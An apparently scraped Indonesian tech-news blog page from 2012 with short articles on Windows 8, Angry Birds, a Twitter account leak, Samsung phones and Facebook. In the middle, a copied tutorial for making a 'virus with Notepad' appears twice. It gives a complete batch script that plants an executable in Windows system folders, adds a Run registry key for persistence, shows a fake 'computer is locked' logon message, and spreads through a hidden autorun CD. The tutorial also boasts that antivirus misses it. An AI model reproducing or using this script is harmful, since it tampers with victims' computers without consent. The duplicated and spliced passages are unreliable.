Minggu, 27 Mei 2012

Inilah Beberapa Aplikasi yang “Dibuang” Oleh Microsoft Di Windows 8



Untuk mengoptimalkan kinerja Windows 8, Microsoft dikabarkan akan merubah dan bahkan membuang beberapa fitur yang tersedia di Windows versi sebelumnya.
Salah satu fitur yang akan dihilangkan adalah fitur Windows Live yang akan berubah menjadi aplikasi pre-install yang merupakan inti dari aplikasi Windows Communications di Windows 8.

Kebijakan ini diambil Microsoft untuk menyederhanakan dan menggabungkan berbagai merek layanan, yang terkesan tumpang tindih.
Selain Windows Live, Microsoft juga akan merubah aplikasi media player musik Zune dari toko aplikasi Windows Store. Namun fitur Zune Pass masih tetap bisa digunakan. Tim Xbox dari Microsoft dipercaya untuk menggarap dan mengatur aplikasi video dan musik yang segar dengan mengadopsi tampilan antarmuka Metro.
Beberapa layanan yang dirubah Microsoft dalam Windows 8 adalah sebagai berikut,
  • Windows Live Contacts berubah jadi People
  • Windows Live Photo Gallery berubah jadi Photos
  • Zune Music Player berubah jadi Music
  • Zune Video Player berubah jadi Video
  • Windows Live ID berubah jadi Microsoft Account
  • Windows Live Mail berubah jadi Mail
  • Windows Live Calendar berubah jadi Calendar

Microsoft Office Akan Hadir di Tablet Android dan iOS Bulan November


Microsoft Office dikabarkan akan segera singgah di tablet berbasis iOS dan Android. Aplikasi kantoran yang sebelumnya hadir di PC berbasis Windows ini akan tersedia di tablet berbasis iOS (iPad) dan tablet Android pada bulan November tahun ini.


Kabar tersebut dikutip dari BGR yang menerima informasi tersebut dari sumber yang dapat dipercaya. Menurut sumber tersebut, saat ini Microsoft tengah berencana untuk merilis Office suite lengkap untuk iPad dan tablet Android.


Bahkan diirumorkan bahwa setelah menghadirkan Microsoft Office di iPad, Microsoft juga akan menghadirkan Microsoft Office di iPhone dan iPod touch.
Sumber dari BGR menyebutkan bahwa pihaknya telah mendapatkan bocoran tampilan Microsoft Office untuk iOS, dan mereka sangat yakin bahwa Microsoft Office tidak hanya akan hadir di iPad saja, tapi juga di iPhone dan iPod Touch.

Angry Birds Friends, Game Terbaru Rovio Sudah Bisa Dimainkan di Facebook


Untuk menambah dominasi Angry Birds sebagai game paling populer khususnya di jejaring sosial, Rovio akhirnya meluncurkan Angry Birds Friends, sebuah game Angry Birds bergenre sosial untuk para pengguna Facebook.


Berbeda dengan konsep game Angry Birds biasa, dalam game Angry Birds Friends, pengguna bisa bermain dan menghadapi tantangan mingguan bersama teman-teman facebook mereka, dan jika bisa mengalahkan pemain lainnya, maka pemenang akan mendapatkan mahkota emas atau power up.

Angry Birds Friends juga telah dilengkapi dengan Facebook Timeline dan akan memposting nilai tertinggi di timeline pemain. Tertarik untuk memainkan Angry Birds Friends? Tenang saja, karena Game ini sudah bisa dimainkan mulai hari ini.

Ghost Recon Commander dari Ubisoft Kini Hadir Di Facebook


Jejaring sosial Facebook akan kedatangan game terbaru dari Tom Clancy’s Ghost Recon, yakni Ghost Recon Commander yang dikembangkan oleh Ubisoft.
Game bergenre first person shooter ini akan memiliki banyak perbedaan dengan yang ada di konsol game atau PC. Ghost Recon  Commander  versi facebook akan tampil dengan format 2D action-adventure yang ditambah dengan  beberapa aspek sosial dan tingkat kompleksitas tersendiri.

ghost recon

Dalam game ini, Para pemain akan diberikan pilihan untuk meng-invite ataupun melakukan sebuah team up bersama-sama dengan teman-teman mereka di Facebook untuk membentuk sebuah grup dan menyelesaikan berbagai misi.


Game Ghost Recon Commander ini juga akan terintegrasi dengan game ‘Ghost Recon Future Soldier’ yang terdapat di versi konsol, sehingga pengguna bisa meng unlock beberapa karakter baru untuk dimainkan dan tambahan petualangan.

Kebobolan Hacker, Pengguna Twitter Dihimbau Ganti Password



twitter kebobolan hacker

Berita menghebohkan datang dari jejaring sosial paling populer saat ini, Twitter mengumumkan bahwa pada selasa (8/5/12) puluhan ribu akun twitter telah dibajak oleh hacker yang belum diketahui identitasnya. Pihak twitter segera menghimbau agar para pengguna cepat cepat mengganti password akun twitter mereka.
Total akun twitter yang di bobol mencapai 58.978 Akun yang berhasil dibajak oleh hacker, dan yang membahayakan yaitu data data tersebut telah di upload di situs hosting terkemuka sebagai tempat menyimpan data berupa tulisan yaitu pastebin.

Juru bicara twitter dalam sebuah kesempatan menyampaikan pesan pesannya kepada pengguna jejaring sosial ini “Kami mengimbau kepada pengguna yang akunnya dibocorkan agar melakukan reset password,”
“Bagi mereka yang khawatir akunnya menjadi korban, sebaiknya mengubah password dan keterangan lebih lanjutnya bisa dilihat di Help Center kami,” tambahnya.
Dalam penyelidikannya terhadap kasus kebobolan yang terhitung besar ini, twitter telah menemukan kurang lebih 20 ribu Username beserta password akun twitter yang dimiliki oleh akun penyebar spam link dan beberapa akun dan username yang sembarang dan tidak bisa digunakan. Pihak twitter tidak lupa melakukan investigasi mendalam terhadap kasus kecolongan ini dan menelusuri bagaimana cara hacker ini menembus security dari twitter.
Hingga saat ini konten username dan password yang berada di pastebin masih bisa kita akses dan belum dihapus oleh pihak pastebin sebanyak 5 halaman.

Gagal Akuisisi Instagram, Twitter Akan Akuisisi Camera+



Seakan ingin mengikuti langkah Facebook yang telah mengakuisisi Instagram. Twitter pun dikabarkan sedang mendekati sebuah aplikasi kamera mobile, Camera+. Sayangnya Twitter sampai saat ini belum membuat sebuah penawaran resmi.
Menurut sumber yang dapat dipercaya, dikutip dari Cnet, situs microblogging populer itu kabarnya mengadakan pertemuan dengan Camera+. Namun, pembicaraan terhenti karena masalah pindahnya lokasi kerja yang cukup jauh yaitu ke San Fransisco.
Sebelum Facebook, Instagram sebenarnya telah terlebih dahulu didekati oleh Twitter, Bahkan Instagram dikabarkan telah menerima penawaran pertama dari Twitter dengan  harga ratusan juta dolar. tapi entah kenapa pemilik Instagram justru menjualnya ke Facebook.
Seperti Instagram, Camera+ juga memungkinkan pengguna untuk mencari foto teman, melihat foto populer dan mengunduh foto mereka sendiri. Camera+ bukanlah aplikasi foto pertama yang berhasil menarik perhatian Twitter. tapi setelah gagal mengakuisisi Instagram, mau tidak mau Twitter
harus mencari alternatif lain.

Cara Membuat virus Dengan Notepad - Di artikel kali ini utuy akan membahas tentang Cara Membuat virus Dengan Notepad. Buata sobat yang pengen nyoba atau cuma iseng buat virus dengan notepad nih utuy kasih tutorialnya. Virus ini memang efek gak terlalu bahaya efeknya yaitu cuma mengganti tampilan dari windows, tapi mungkin bikin cukup kanget juga'!!! dan anehnya gak ke-detect sama antivirus [setahu saya]. Ok sobat gak usah lama-lama deh langsung saja nih cara nya. Cara Membuat virus Dengan Notepad * Buka Notepadnya lalu copy script dibawah ini @echo off copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\ /y copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\WINDOWS\ /y copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\WINDOWS\system32\ /y copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\ /y copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\WINDOWS\ /y copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\WINDOWS\system32\ /y reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v LegalNoticeCaption /d “WARNING MESSAGE FROM LOCAL_HOST(judul title bar)” /f reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v LegalNoticeText /d “I HAVE RUINED YOUR COMPUTER AND YOUR COMPUTER IS LOCKED(pesan pembuat)” /f reg add “HKEY_CURRENT_USER\Control Panel\Desktop” /v Wallpaper /d %systemdrive%\WINDOWS\system32\image_name(terserah dari nama file gambar pembuat).bmp /f reg add “HKEY_CURRENT_USER\Control Panel\Desktop” /v WallpaperStyle /d 0 /f reg add “HKEY_USERS\.DEFAULT\Control Panel\Desktop” /v Wallpaper /d %systemdrive%\WINDOWS\system32\image_name(terserah dari nama file gambar pembuat).bmp /f reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /v nama_terserah /d %systemdrive%\windows\system32\nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe /f reg add “HKEY_CURRENT_USER/Control Panel/Colors” /v window /d #000000(atau kombinasi warna RGB lain,cari pake Adobe Photoshop) /f * Lalu di "SAVE ALL FILE" dengan extensi .bat (nama_file.bat) * Buat Autorun.inf dengan script [autorun] open=nama_file.bat * Lalu di "SAVE ALL FILE" dengan extensi .inf (Autorun.inf) * File -file tersebut harus dalam 1 direktori, lalu seleksi file-file tersebut dengan cara klik kanan pilih Properties beri tanda check pada Hidden dan Read-Only * Copy file-file tersebut ke CD * Nikmati efeknya.. ahihiCara Membuat virus Dengan Notepad - Di artikel kali ini utuy akan membahas tentang Cara Membuat virus Dengan Notepad. Buata sobat yang pengen nyoba atau cuma iseng buat virus dengan notepad nih utuy kasih tutorialnya. Virus ini memang efek gak terlalu bahaya efeknya yaitu cuma mengganti tampilan dari windows, tapi mungkin bikin cukup kanget juga'!!! dan anehnya gak ke-detect sama antivirus [setahu saya]. Ok sobat gak usah lama-lama deh langsung saja nih cara nya. Cara Membuat virus Dengan Notepad * Buka Notepadnya lalu copy script dibawah ini @echo off copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\ /y copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\WINDOWS\ /y copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\WINDOWS\system32\ /y copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\ /y copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\WINDOWS\ /y copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\WINDOWS\system32\ /y reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v LegalNoticeCaption /d “WARNING MESSAGE FROM LOCAL_HOST(judul title bar)” /f reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v LegalNoticeText /d “I HAVE RUINED YOUR COMPUTER AND YOUR COMPUTER IS LOCKED(pesan pembuat)” /f reg add “HKEY_CURRENT_USER\Control Panel\Desktop” /v Wallpaper /d %systemdrive%\WINDOWS\system32\image_name(terserah dari nama file gambar pembuat).bmp /f reg add “HKEY_CURRENT_USER\Control Panel\Desktop” /v WallpaperStyle /d 0 /f reg add “HKEY_USERS\.DEFAULT\Control Panel\Desktop” /v Wallpaper /d %systemdrive%\WINDOWS\system32\image_name(terserah dari nama file gambar pembuat).bmp /f reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /v nama_terserah /d %systemdrive%\windows\system32\nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe /f reg add “HKEY_CURRENT_USER/Control Panel/Colors” /v window /d #000000(atau kombinasi warna RGB lain,cari pake Adobe Photoshop) /f * Lalu di "SAVE ALL FILE" dengan extensi .bat (nama_file.bat) * Buat Autorun.inf dengan script [autorun] open=nama_file.bat * Lalu di "SAVE ALL FILE" dengan extensi .inf (Autorun.inf) * File -file tersebut harus dalam 1 direktori, lalu seleksi file-file tersebut dengan cara klik kanan pilih Properties beri tanda check pada Hidden dan Read-Only * Copy file-file tersebut ke CD * Nikmati efeknya.. ahihi

Original Article from: http://utuy-semrawut.blogspot.com/2012/02/cara-membuat-virus-dengan-notepad.html
Copyright Utuy-SemrawutDengan software ini kita tidak hanya bisa mengatur shut down, tapi bisa juga untuk mengatur waktu restart dan log off, ukuran software ini kecil hanya sekitar 531.5KB Dengan software ini kita tidak hanya bisa mengatur shut down, tapi bisa juga untuk mengatur waktu restart dan log off, ukuran software ini kecil hanya sekitar 531.5KB Dengan software ini kita tidak hanya bisa mengatur shut down, tapi bisa juga untuk mengatur waktu restart dan log off, ukuran software ini kecil hanya sekitar 531.5KB

Original Article from: http://utuy-semrawut.blogspot.com/2011/04/shut-down-timer-untuk-mengatur-waktu.html
Copyright Utuy-Semrawut

Pola Berinternet Tunjukkan Depresi Seseorang


Penggunaan internet ternyata menunjukkan apakah seseorang sedang mengalami depresi atau tidak. Penelitian dari Missouri University of Science and Technology, menunjukkan pengguna internet yang depresi melakukan browsing secara lebih acak, beralih antara beberapa aplikasi.
Para peneliti menganalisis penggunaan internet di kalangan mahasiswa dan menemukan bahwa mahasiswa yang menunjukkan tanda-tanda depresi cenderung memiliki pola browsing yang berbeda dari yang lain.
Para peneliti mengidentifikasi sembilan pola penggunaan internet yang dapat mengindikasikan depresi.
Salah satu polanya yakni mahasiswa menunjukkan tanda-tanda depresi cenderung menggunakan layanan berbagi file lebih dari rekan-rekan mereka, dan juga menggunakan internet lebih acak, sering beralih di antara beberapa aplikasi. Mereka juga mengirim email dan chatting online lebih dari mahasiswa lain.
Mahasiswa yang depresi juga cenderung menggunakan paket data lebih tinggi dari rekan-rekan mereka. Aplikasi bandwidth tinggi yang digunakan sering dikaitkan dengan video online dan permainan.
“Studi ini diyakini menjadi yang pertama yang menggunakan data internet yang sebenarnya. Data dikumpulkan secara diam-diam dan anonim untuk menghubungkan penggunaan internet dengan tanda-tanda depresi,” kata Sriram Chellappan, peneliti Missouri University of Science and Technology seperti dilansir dari laman livescience.
Para peneliti secara anonim mengumpulkan data internet berharga sebulan dari 216 mahasiswa. Para mahasiswa juga diuji untuk tanda-tanda depresi, sekitar 30 persen di antaranya memenuhi kriteria minimum untuk depresi.
Para peneliti kemudian menganalisis data penggunaan dari para peserta studi. Mereka menemukan bahwa siswa yang menunjukkan tanda-tanda depresi menggunakan Internet jauh berbeda dengan peserta studi lainnya.
Chellappan berpikir keacakan mengindikasikan kesulitan berkonsentrasi, sebuah karakteristik yang berkaitan dengan depresi.
Chellappan sekarang tertarik menggunakan temuan ini untuk mengembangkan perangkat lunak yang dapat diinstal pada komputer rumah untuk membantu individu menentukan apakah internet mereka dapat menunjukkan pola penggunaan depresi.
Perangkat lunak ini secara diam-diam akan memantau penggunaan Internet dan mewaspadai individu jika pola penggunaan mereka menunjukkan gejala depresi.
“Perangkat lunak ini akan menjadi alat yang hemat biaya dan dalam peralatan rumah yang secara proaktif bisa meminta pengguna untuk mencari bantuan medis, jika pola penggunaan internet mereka menunjukkan kemungkinan depresi,” kata Chellappan.
“Perangkat lunak ini juga bisa dipasang pada jaringan kampus untuk memberitahu konselor mahasiswa yang pola penggunaan internet mengindikasi dari perilaku depresif tersebut,” katanya.
Penelitian ini telah diterima untuk publikasi dalam edisi mendatang dari IEEE Teknologi dan Society Magazine.

Angry Birds Diunduh 1 Miliar Kali



Rovio mengumumkan game Angry Birds telah diunduh lebih dari 1 miliar kali. “Terima kasih kepada semua penggemar game kami. Ini baru awal dari sebuah cerita,” kata Rovio dalam pernyataannya di blog, seperti dikutip PC World, Kamis, 10 Mei 2012.
Kendati mengambil konsep permainan yang sederhana–hanya dengan melontarkan burung ke sasaran, game ini berhasil menarik perhatian banyak orang.
Angry Birds pertama kali muncul pada Desember 2009 di Apple App Store dan hanya dapat dimainkan di iPhone, iPad, dan iPod Touch.
Enam bulan lalu, Rovio menyatakan permainan Angry Birds telah diunduh sebanyak 500 juta kali. Kemudian pada April lalu, perusahaan game asal Finlandia ini merilis Angry Birds Space yang mengambil latar luar angkasa dan telah diunduh 50 juta kali dalam tempo 35 hari.
Rovio mengatakan para penggemar Angry Birds memainkan game ini selama 300 juta menit setiap hari.
Selanjutnya, Rovio berencana membuat film yang mengambil karakter si burung marah dan membangun taman Angry Birds di Cina. »Tunggu kejutan kami selanjutnya,” tulis Rovio.
PC WORLD

Skype Tak Cocok untuk Lumia 610


Berita kurang menyenangkan datang bagi para pengguna Lumia 610. Smartphone Windows Phone terbaru dari Nokia dengan harga paling murah ini kabarnya tak cocok dengan aplikasi Skype.”Walaupun Skype versi Windows Phone dapat berjalan di Lumia 610, setelah pengujian yang mendalam, kami menemukan bahwa pengalaman yang akan didapatkan para pengguna tidak sesuai dengan ekspektasi dari Nokia dan Skype,” jelas pihak Nokia seperti dikutip dari Slashgear, Rabu (23/5).
Perusahaan asal Finlandia itu menambahkan, mereka tidak merekomendasikan untuk menggunakan Skype di Lumia 610. Nantinya, para pengguna Lumia 610 tidak lagi bisa mengunduh aplikasi tersebut dari Windows Phone Marketplace.
Penyebab utamanya disinyalir akibat kurangnya RAM di Lumia 610. Standar RAM untuk Windows Phone adalah 512MB, Lumia 610 hanya dibekali 256MB.
Belum jelas apakah selanjutnya aplikasi Skype akan dirombak khusus untuk smartphone berspesifikasi rendah atau tidak. Namun yang pasti, Microsoft sendiri tak akan tinggal diam dan membiarkan para pelanggannya kecewa mengingat Skype adalah salah satu daya tarik utama dari Windows Phone.
Lumia 610 memang merupakan smartphone Windows Phone dengan banderol paling murah dari seri Lumia lainnya. Harganya yang hanya Rp 2,2 jutaan membuat Nokia harus memangkas ‘jeroan’ yang dibenamkan pada smartphone ini dari berbagai sisi.



Symbian Carla Batal Dirilis Karena Symbian Sepi Peminat



Kabar yang beredar belakangan ini, yang disampaikan oleh Mathias Fiorin, Product Marketing Manager Nokia yang bertugas untuk wilayah kawasan Eropa Selatan, Kepada media mengungkapkan mengenai perkembangan project symbian carla bahwa development  Symbian Carla yang digadang sedang dikerjakan sebagai Symbian versi terbaru oleh Nokia ternyata telah dibatalkan.
Mathias Fiorin dalam kesempatan yang sama pun mengungkapkan bahwa nantinya OS yang diberi gelar “Carla” ini telah diputuskan hanya akan dibuat sebagai FP1 atau Feature Packs (FP) yang mana nanti akan dirilis.
Keputusan yang diambil Nokia atas pembatalan development OS barunya ini diperkirakan disebabkan oleh penjualan handset Nokia berbasis Symbian yang penjualannya semakin mengalami penurunan. Pengguna Symbian saat ini nampaknya telah banyak beralih pada Produk Android serta Apple dan mulai meninggalkan Symbian.

CP-A2LAS : Inovasi Charger Bertenaga Putaran tangan



Sebagai upaya pengehmatan serta efisiensi tenaga, kini perusahaan raksasa SONY telah berhasil menciptakan sebuah inovasi dalam pembuatan charger, Charger portabel buatan sony ini dibuat dengan mengandalkan putaran tangan untuk proses menghasilkan listrik.
Yang menarik dari charger portabel ini adalah untuk menghasilkan listrik pada charger ini caranya adalah dengan mengandalkan tenaga putaran tangan mirip saat menggunakan rautan pensil.
Menurut pihak Sony pembuatan sistem kerja charger ini adalah dengan mengadopsi prinsip generator listrik sederhana. Dikabarkan pada saat digunakan dalam kondisi normal, baterai yang di charge akan terisi daya sampai 4000 mAh.

Penggunaanya terbilang cukup mudah, yakni pengguna cukup memutar selama 3 menit saja  untuk proses pengisian baterai ponsel, dan siap untuk bertahan selama 1 menit waktu bicara.
USB charger portabel CP-A2LAS ini, rencananya akan mulai di pasarkan untuk kalangan pengguna di Jepang dengan harga sekitar US$ 100 atau sekitar Rp 920 ribu.

Ngebet Punya Ipad ? Coba Ipad Mini Hanya 2 Jutaan



beberapa bulan terakhir ini cukup ramai digosipkan mengenai tablet Apple dengan ukuran layar lebih kecil atau disebut dengan “iPad Mini”

Penggunaan layar “thin-film” pada ipad mini ini konon memungkinkan produksi “iPad Mini”  ini nantinya bisa diproduksi dengan bentuk lebih tipis.
Kabar yang beredar sebelumnya mengenai tablet ini yaitu  ”iPad Mini” yang digadang akan diproduksi Apple ini merupakan versi lebih kecil dari perangkat iPad yang sudah diproduksi Apple sebanyak tiga generasi.

Beberapa sumber yang mencoba menerka produk baru Apple ini menyebutkan bahwa “iPad Mini” akan dilengkapi dengan layar Retina Display, layaknya yang digunakan pada perangkat iPhone 4/4S serta iPad generasi ketiga.  Dalam perangkat ini pun terdapat spesifikasi tambahan lain juga termasuk memori internal sebesar 8 GB.
Yang menarik, kabarnya “iPad Mini’ yang akan diproduksi massal ini nanti bakal dibanderol dengan harga sekitar 200 – 250 dollar AS atau Rp 1,8 juta – 2,3 juta rupiah sehingga bisa bersaing dengan perangkat-perangkat sejenis.

Samsung Galaxy Pocket Handphone Android Harga Murah


Samsung Galaxy Pocket adalah salah satu handphone android dari jajaran Samsung Galaxy series. Dengan harga handphone android yang murah, gadget ini dihadirkan untuk kalangan bawah menemani pendahulunya yaitu Samsung Galaxy Y. Sesuai dengan namanya “Pocket” handphone android ini berukuran lebih kecil dibandingkan dengan semua Samsung Galaxy series.
Desain Samsung Galaxy Pocket hampir sama dengan beberapa Samsung Galaxy series tetapi pada sudutnya tampak lebih melengkung. Untuk dimensinya yang mungil ukurannya 103.7 X 57.5 X 12 mm berat 97 gram. Dengan dimensi bodi yang mungil layarnya pun hanya sebesar 2.8 inchi (240 X 320 piksel) menggunakan TFT touchscreen.
Samsung Galaxy Pocket pada  menggunakan prosesor 832 MHz dengan memori internal sebesar 3 GB. Fitur tersebut untuk mendukung jalannya sistem operasi Android 2.3 Gingerbread. Pada fitur kamera  handphone android ini hanya berkekuatan 2 Megapiksel tanpa adanya lampu flash. Untuk fitur yang selengkapnya ada pada tabel dibawah ini.
GENERAL Network GSM 850 / 900 / 1800 / 1900 ,3G HSDPA 850 / 900 / 1700 / 1900 / 2100
LAYAR Tipe TFT Touchscreen
Ukuran 240 x 320 pixels, 2.8 inches (~143 ppi pixel density, Multitouch, TouchWiz UX UI
DIMENSI Ukuran/Berat 103.7 x 57.5 x 12 mm / 97 g
AUDIO Fitur Vibration, MP3 Ringtones
Jack 3.5mm jack audio
Speakerphone Ya
MEMORY Internal 3GB (1GB User Memory + 2GB Shared Storage)
Eksternal microSD, up to 32GB
DATA 3G HSDPA, 3.6 Mbps; HSUPA
EDGE Ya
GPRS Ya
WLAN Wi-Fi 802.11 b/g/n, Wi-Fi hotspot
Bluetooth v3.0 with A2DP
Infrared Tidak
USB/Port v2.0 microUSB
KAMERA Primer 2 MP, 1600×1200 pixels
Sekunder Tidak
Video Record Ya
BATERAI Tipe Standard battery, Li-Ion 1.200mAh
Standby Up to 520hr (2g), up to 460hr (3g)
Talk Time Up to 950min (2g), up to 360min (3g)
FITUR OS Android 2.3 Gingerbread
CPU 832 MHz
Browser HTML
GPS A-GPS support
Messaging SMS(threaded view), MMS, Email, Push Mail, IM
Java Ya, with MIDP 2.1 – SNS integration – Organizer – Image/video editor – Google Search, Maps, Gmail, YouTube, Calendar, Google Talk, Picasa integration – Quickoffice document viewer/editor – Voice memo – Predictive text input (Swype)
FITUR LAIN
Video Player 3GPP / H.263 / H.264 / MPEG4
MP3 Player MP3 / AAC / AAC+ / AMR / AMR-NB / eAAC+
Audio Record Ya
TV Tidak

9 Juta Galaxy S III


Beritacyber – Samsung mencatat sukses besar dengan laporan yang menyebutkan bahwa pemesan awal untuk Galaxy S III mencapai 9 juta unit. Hasil tersebut menjadikan gadget ini sebagai salah satu penjualan tercepat yang pernah ada.
Sembari menunggu Galaxy S III hadir secara perdana di seluruh dunia, menarik bila menghitung-hitung berapa pekerja untuk memproduksi 9 juta ponsel tersebut dalam sebulan.
Blog teknologi ExtremeTech pun coba mencari tahu, dengan hitung-hitungan kalkulator ditambah mengumpulkan beberapa data pekerja Samsung. Hasilnya, perusahaan asal Korea Selatan itu membutuhkan setidaknya lebih dari 75 ribu pekerja untuk membuat 9 juta Galaxy S III.
Lalu bagaimana cara menghitungnya?
Seperti dikutip dari Phone Arena, Senin (21/5/2012), sebagai perbandingan Extremetech pernah mengutip salah seorang pekerja Foxconn yang mengatakan sehari setidaknya 3.500 iPhone berhasil dirakit. Dengan hitungan sederhana, diperkirakan dalam sebulan, 640 pekerja Foxconn mampu memproduksi 84 ribu iPhone
Kembali ke Galaxy S III, diketahui Samsung mempunyai 60 lini produksi dengan total pekerja mencapai 38.400 orang. Ini artinya, para pekerja di Samsung bisa memproduksi sekitar 5 juta ponsel dalam sebulan. Dari jumlah tersebut tinggal dikalikan dua saja, yakni 76.800 pekerja untuk sekitar 9 juta lebih handset.
Penting untuk mengetahui bahwa suku cadang yang digunakan di Samsung Galaxy S III dari layar OLED, prosesor exynos quad-core, RAM hingga NAND flash, semua dibuat oleh Samsung.
Beberapa point menarik lainnya yang disebutkan oleh ExtremeTech termasuk perbedaan gaji besar antara pekerja China dan Korea soal perakitan Apple iPad. Pekerja di China mendapatkan USD 8 per iPad, sementara para pekerja di Korea melakukan pekerjaan yang sama menerima USD 34 per tablet.
Upah bulanan rata-rata untuk pekerja Foxconn China adalah USD 400, sedangkan USD 2.000 untuk para pekerja Korea.

S Voice Vs Siri Milik Iphone : Sama Sama Gak Ngerti Bahasa Indonesia



Fitur Cerdas Siri yang dibenamkan pada Iphone 4S memang merupakan sesuatu yang mengaggumkan bagi penggunanya, Dengan kemampuan deteksi pertanyaan serta perintah suara. Dan membuat banyak pengguna Iphone beranjak pada Iphone 4S hanya demi mendapatkan fitur Siri yang digagas menjadi fitur tercangiih smartphone saat ini.
Seraya tak ini kalah, S Voice pun didevelop oleh samsung untuk dapat menghadirkan kebutuhan asisten pribadi layaknya Siri pada Iphone.

Jika pada Siri bahasa yang didukung yaitu sebatas penggunaan bahasa Inggris, Jerman, Perancis, kemudian dijanjikan untuk bahasa Jepang, China, Korea, Italia dan Spanyol.
Lain lagi dengan S Voice, saat ini sudah dapat mendukung bahasa Inggris, Perancis, Jerman, Italia, Spanyol, Spanyol Latin, dan Korea.
Namun sayang, nampaknya hingga saat ini kedua duanya masih belum support bahasa Indonesia, yang artinya belum bisa maksimal digunakan oleh orang Indonesia, kecuali jika sang pengguna cukup fasih berbahasa Inggris.

Namun kabar yang beredar pada perangkat Samsung yang memiliki S Voice nantinya akan dikembangkan agar mendukung bahasa Indonesia.

Sekarang Lightbox Ditangan Facebook


Saat ini raksasa jejaring sosial Facebook telah menjadi perbincangan hangat di dunia maya. Facebook yang nilai saham IPO nya benar – benar melambung tinggi di bursa saham, membuat facebook terus gencar melebarkan sayap bisnisnya dengan mengakuisisi layanan foto yang cukup terkenal dikalangan pengguna Android, Lightbox. Sebelumnya Facebook juga telah mengakuisisi Instagram senilai $ 1 Milyar yang sampai saat ini masih kontroversial dan kini berlanjut dengan akuisisi Lightbox.
"lightbox dibeli facebook"
Setelah layanan Lightbox dibeli oleh Facebook, maka Lightbox tidak lagi menerima pendaftaran pengguna baru. Bagi penguna terdaftar masih dapat menggunakan layanan Lightbox dan diberi kesempatan untuk mengunduh koleksi fotonya hingga 15 Juni
Lightbox adalah layanan edit foto dan sharing foto yang yang cukup populer di platform Android, bahkan beberapa orang menjulukinya sebagai Instagram-nya Android. Layaknya Instagram, aplikasi Lightbox ini juga menyediakan berbagai macam filter untuk mempercantik foto dan juga disediakan fitur editing standar seperti crop dan rotate.
Seperti yang dikutip dari Slashgear, pembelian Facebook atas Lightbox ini tidak termasuk perusahaan Lightbox sendiri tapi hanya stafnya saja. Kabarnya, kode perangkat lunak milik Lightbox akan menjadi open source melalui Github beberapa minggu yang akan datang.
Pembelian Facebook atas Lightbox ini dinilai sebagai kemenangan situs jejaring sosial terpopuler ini, karena telah mengakuisisi 2 aplikasi fotografi besar dari dua platform yang berbeda.

Facebook Bisa Berbahaya bagi Karir Anda


Sebenarnya sudah lama dihimbau memposting sembarangan di facebook bisa berbahaya bagi karir anda, namun sepertinya hal ini masih diabaikan. Entah karena tidak percaya atau tidak perduli, namun sanksi dari memposting sembarangan tidak main main.
Baru-baru ini, enam pekerja di Amerika Serikat dipecat karena mengeklik “like” di halaman Facebook lawan politik bos mereka di kantor. Hakim federal menyatakan pemecatan tersebut sah karena mengeklik “like” tidak termasuk kategori kebebasan menyatakan pendapat yang dilindungi oleh undang-undang AS.
Ternyata di Australia, anda tidak bisa sebebas mungkin untuk mengeluarkan pendapat, pasalnya hak mengeluarkan pendapat tidak dilindungi oleh undang-undang dasar . Jadi andalah yang harus sadar dimana anda tinggal.
Tahun lalu, seorang petugas lapangan bernama Alec Amstrong, dipecat dari pekerjaannya setelah berkomentar di Facebook dengan akun miliknya mengatakan bahwa dewan kota praja tempatnya bekerja kebanyakan memiliki pekerja kantoran, tidak cukup melakukan pekerja lapangan. Hanya karena kata kata tersebut ia pun dipecat.

Tak hanya di Australia, di Amerika Serikat, Sherif Kota Hampton Virginia, BJ Roberts, memecat enam stafnya yang menyukai Facebook saingan sherif dalam pemilihan di tahun 2009. Sang sherif mengatakan tindakan tersebut “menciptakan sikap tidak harmonis di kantor”.
Lalu kemudian kasus yang dialami Jane Morgan yang diberhentikan dari perusahaan konstruksi di Sydney pada tahun 2009, hanya karena ia saat itu menulis pesan di Facebook temannya bahwa perusahaannya “bobrok.” dan tak lama kemudian ia juga dipecat dari pekerjaannya.

Robin Young, seorang pengacara di Sydney memberikan tanggapannya terhadap masalah pemecatan akibat masalah sepele tersebut;
“Sekarang orang sudah jarang datang ke pub dan mengeluh tentang masalah mereka kepada teman-teman sekerja, tetapi justru mereka menulis di komputer dan yang menjadi salah karena status mereka bisa dibaca oleh 10 juta orang. Untuk itu mereka harus berhati-hati,”
Menurutnya lagi, apabila kita menceritakan hal yang buruk mengenai perusahaan tempat kita bekerja di ranah publik seperti Facebook, maka alasan pemecatan bisa dilakukan.
“Karyawan harus sadar bahwa bos mereka nantinya akan melihat apa yang tertulis di Facebook dan walau ada setting yang membuat pernyataan jadi terbatas, sesuatu yang kita sampaikan ke teman bisa kemudian menjalar ke teman lain dengan mudah, di luar kuasa kita.” kata Young.

